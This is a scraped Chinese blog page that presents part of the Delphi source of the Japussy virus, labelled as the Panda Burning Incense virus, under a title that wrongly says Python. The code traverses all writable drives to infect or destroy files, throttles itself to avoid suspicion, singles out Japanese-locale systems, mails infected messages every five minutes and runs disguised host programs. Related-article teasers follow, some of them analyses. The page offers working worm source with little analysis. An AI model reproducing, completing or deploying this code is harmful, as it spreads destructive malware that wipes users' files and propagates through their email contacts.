python熊猫烧香_熊猫烧香完整源代码

最新推荐文章于 2025-06-09 20:51:12 发布
最新推荐文章于 2025-06-09 20:51:12 发布
阅读量1.3w 收藏 27
点赞数 10
CC 4.0 BY-SA版权
文章标签: python熊猫烧香
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_39693950/article/details/111438114
这篇博客详细解析了Python实现的熊猫烧香病毒的部分源代码,包括文件感染、目录遍历和邮件发送等关键步骤。通过了解这段代码,读者可以深入理解病毒的工作原理及其在操作系统中的行为。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

SmashFile(Fn); //摧毁文件

end;

end;

end;

//感染或删除一个文件后睡眠200毫秒,避免CPU占用率过高引起怀疑

Sleep(200);

until (FindNext(SearchRec) <> 0);

end;

FindClose(SearchRec);

SubDir := TStringList.Create;

if (FindFirst(Path + '*.*', faDirectory, SearchRec) = 0) then

begin

repeat

if IsValidDir(SearchRec) = 1 then

SubDir.Add(SearchRec.Name);

until (FindNext(SearchRec) <> 0);

end;

FindClose(SearchRec);

Count := SubDir.Count - 1;

for i := 0 to Count do

LoopFiles(Path + SubDir.Strings + '', Mask);

FreeAndNil(SubDir);

end;

{ 遍历磁盘上所有的文件 }

procedure InfectFiles;

var

DriverList: string;

i, Len: Integer;

begin

if GetACP = 932 then //日文操作系统

IsJap := True; //去死吧!

DriverList := GetDrives; //得到可写的磁盘列表

Len := Length(DriverList);

while True do //死循环

begin

for i := Len downto 1 do //遍历每个磁盘驱动器

LoopFiles(DriverList + ':', '*.*'); //感染之

SendMail; //发带毒邮件

Sleep(1000 * 60 * 5); //睡眠5分钟

end;

end;

{ 主程序开始 }

begin

if IsWin9x then //是Win9x

RegisterServiceProcess(GetCurrentProcessID, 1) //注册为服务进程

else //WinNT

begin

//远程线程映射到Explorer进程

//哪位兄台愿意完成之?

end;

//如果是原始病毒体自己

if CompareText(ExtractFileName(ParamStr(0)), 'Japussy.exe') = 0 then

InfectFiles //感染和发邮件

else //已寄生于宿主程序上了,开始工作

begin

TmpFile := ParamStr(0); //创建临时文件

Delete(TmpFile, Length(TmpFile) - 4, 4);

TmpFile := TmpFile + #32 + '.exe'; //真正的宿主文件,多一个空格

ExtractFile(TmpFile); //分离之

FillStartupInfo(Si, SW_SHOWDEFAULT);

CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True,

0, nil, '.', Si, Pi); //创建新进程运行之

InfectFiles; //感染和发邮件

end;

end.

[系统安全] 十一.那些年的熊猫烧香及PE病毒行为机理分析
杨秀璋的专栏
01-04 6951
如果你想成为一名逆向分析或恶意代码检测工程师,或者对系统安全非常感兴趣,就必须要认真分析一些恶意样本。熊猫烧香病毒就是一款非常具有代表性的病毒,当年造成了非常大的影响,并且也有一定技术手段。本文将详细讲解熊猫烧香的行为机理,并通过软件对其功能行为进行分析,这将有助于我们学习逆向分析和反病毒工作。后续作者还将对其进行逆向调试,以及WannaCry勒索蠕虫、各种恶意样本及木马的分析。基础性文章,希望您喜欢!同时,本文部分实验参考姜晔老师的视频分析,真的非常佩服和值得去学习的一位老师。技术路上哪有享乐,为了提升安
[系统安全] 五十五.恶意软件分析 (7)IDA Python基础用法及CFG控制流图提取详解[上]
杨秀璋的专栏
01-22 1830
前文介绍了软件来源分析,结合网络攻击中常见的判断方法,利用Python调用扩展包进行区域溯源。这篇文章将开启IDA Python学习,首先介绍IDA Python配置过程和基础用法,然后尝试地区恶意软件的控制流图(CFG),再为后续的恶意软件家族分类或溯源提供帮助。由于作者是初学者,因此会遇到很多问题,欢迎各位大佬和读者指导。基础性基础,且看且珍惜。
熊猫烧香C语言源代码,熊猫烧香病毒源代码 1.0 完整版 (图文)
热门推荐
weixin_28885791的博客
05-22 1万+
熊猫烧香”是一种可经过多次变种的蠕虫病毒变种形态,新云软件园提供熊猫烧香病毒源代码下载,它能感染系统中exe,com,pif,src,html,asp等文件,它还能中止大量的反病毒软件进程并且会删除扩展名为gho的文件,该文件是一系统备份工具GHOST的备份文件,使用户的系统备份文件丢失。被感染的用户系统中所有.exe可执行文件全部被改成熊猫举着三根香的模样。源码分析大体的看了下,主要是通过拷贝...
熊猫烧香”源码启示录
leagle
03-13 3006
随着“熊猫烧香”病毒的始作俑者的落网,关于“熊猫烧香”病毒的危害和杀毒风波告一段落,然而随着“熊猫烧香”病毒源代码在网上的流行,一种隐含的巨大的危害仿佛才刚刚开始。  一、 引言     去年秋天回趟老家,适逢家中秋收后“祭宅神”。期间,听亲家二大娘在香毕吟颂的《十柱香》的佛歌,深有感触:百姓烧香祝的是神仙幸福,盼的是亲人平安—这是作为衣食百姓发自内心的心愿!但如今,正待举国上下、一家老小庆祝金猪
17年前,编写“熊猫烧香”的顶级黑客,自学编程感染百万用户电脑,却二进宫被抓,如今他过得怎么样?从零基础到精通,收藏这篇就够了!
最新发布
A1_3_9_7的博客
06-09 718
2006年的秋天,一只看似可爱的小熊猫突然出现在全国数百万台电脑屏幕上。它手持香火,神态憨萌,却在短短几个月内让无数网民叫苦不迭。这个堪称中国互联网史上最具破坏力的病毒程序“熊猫烧香”,出自一位年仅24岁的青年之手。他就是被媒体称为“毒王”的李俊。
熊猫烧香病毒代码
2301_81967414的博客
12-28 1771
if (iID = ID) or (SrcStream.Size < 10240) then //太小的文件不感染。if CompareText(FileName, 'JAPUSSY.EXE') = 0 then //是自己则不感染。if (Buf[0] = #80) and (Buf[1] = #69) then //PE标记。else if Ext = '.ADC' then //Foxmail地址自动完成文件。else if Ext = '.WAB' then //Outlook地址簿文件。
熊猫烧香源代码
weixin_34378767的博客
02-07 877
熊猫烧香源代码
Crossbow病毒开放源代码计划的源程序
荣植华的专栏
02-07 1713
传说中的熊猫烧香源代码这个是2003年的Crossbow病毒开放源代码计划我简单看了一下却是有不少制的借鉴的地方嘿嘿不过我编译出来的杀软却没有报毒,我也没敢执行试试如果代码里面的功能都能正常运行的话还是蛮有威力的有胆子的自己测试program Japussy;usesWindows, SysUtils, Classes, Graphics, ShellAPI{, Registry};constHe
python 弹窗 模拟熊猫烧香病毒 适合老师开学特别的自我介绍
Jane_Eyre111的博客
11-26 3062
python代码做弹窗小程序, 模拟熊猫烧香病毒, 适合老师开学特别的自我介绍。
[系统安全] 二十五.WannaCry勒索病毒分析 (1)Python复现永恒之蓝漏洞实现勒索加密
杨秀璋的专栏
02-27 1万+
作者前文介绍了逆向分析之OllyDbg动态调试工具,包括INT3断点、反调试、硬件断点和内存断点。这篇文章将分享新知识,最近WannaRen勒索软件爆发(下图是安天的分析攻击流程),其名称和功能与WannaCry相似,所以接下来作者将连续分享WannaCry勒索病毒的复现及分析,第一篇文章将采用Github资源实现永恒之蓝漏洞利用及Windows7系统文件加密。希望这系列文章对您有所帮助,漫漫长征路,偏向虎山行。享受过程,一起加油~
[系统安全] 五十七.恶意软件分析 (9)利用MS Defender实现恶意样本家族批量标注(含学术探讨)
杨秀璋的专栏
04-18 886
前文介绍了IDA Python配置过程和基础用法,然后尝试提取恶意软件的控制流图(CFG)。这篇文章将讲解如何利用MS Defender实现恶意样本家族批量标注,在通过VS、VT采集批量样本后,通常需要样本家族标注,如何准确识别家族类别至关重要,其将为后续的恶意软件家族分类或溯源提供帮助。在此感谢李师弟热心的指导和帮助,基础性基础,希望您喜欢,且看且珍惜。
熊猫烧香”部分源代码-仅用于学习
hijack-x's Blog
04-10 5593
熊猫烧香”病毒是用DELPHI写的以下是部分源码 **************************************** program Japussy; uses Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry}; const HeaderSize = 82432; //病毒体的大小 IconOffset =
【病毒分析】——熊猫烧香 && 专杀工具C源码
VI___
11-28 5971
最近忙里偷闲,将自己分析过的一些病毒记录一下,一是给刚入门的小白有个借鉴,二是不让自己写博客的习惯停下来。 一、基本信息 FileName panda.exe Type 感染型病毒 Size 30001 bytes MD5 512...
'熊猫烧香'病毒专题:多少变种,怎么破坏,如何查杀?
weixin_34177064的博客
11-09 330
这个幽默又具有破坏力的病毒恐怕最近中招的不少,来看看这篇技术分析: 一、熊猫烧香有几个变种?到目前为止,从大体上分,目前主要有四大变种,变种A我们已经分析,见本版,变种B的就是大家常说的spoclsv.exe进程,它藏的全路径是:% SystemRoot%/Driversspoclsv.exe,其它部分与变种A基本一致.变种C主要的改动是对抗杀毒软件,尤...
熊猫烧香病毒源代码及分析
WELFSDAF的博客
05-28 6690
熊猫烧香”简介:“熊猫烧香”病毒是一个能在电脑操作系统上运行的蠕虫病毒。采用“熊猫烧香”头像作为图标。它的变种会感染EXE可执行文件,被病毒感染的文件图标均变为“熊猫烧香”。同时,受感染的计算机还会出现蓝屏、频繁重启以及文件被破坏等现象。该病毒会在中毒电脑中所有的网页文件尾部添加病毒代码。目前已有百万台电脑受害。 programJapussy; uses Windows,SysUtils,Classes,Graphics,ShellAPI{,Registry}; const HeaderS...
熊猫烧香代码_此功能可以使您的熊猫代码明显更快
weixin_26731327的博客
08-31 453
熊猫烧香代码Pandas is an awesome library, but it’s not the fastest. There are ways of making it faster though, and that is by using the right tool for the right task. Today we’ll explore one of these tools,...
python实现邮件发送图表_python基于SMTP实现可视化邮件发送
weixin_39525313的博客
11-29 709
python基于SMTP实现可视化邮件发送今天无敌哥带大家来实现一下通过python程序来发送邮件。环境:python3.8 pycharm首先我们先来说一下SMTP,SMTP是发送邮件的协议,Python内置对SMTP的支持,可以发送纯文本邮件、HTML邮件以及附件邮件,python对SMTP支持有smtplib和email两个模块,email负责构造邮件,smtplib负责发送邮件。第一步:因...
熊猫烧香 - 核心源码 (僅供研究使用!後果自行負責 )
hunhun02的专栏
03-01 1574
熊猫烧香 - 核心源码 -------------------------------------------------
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值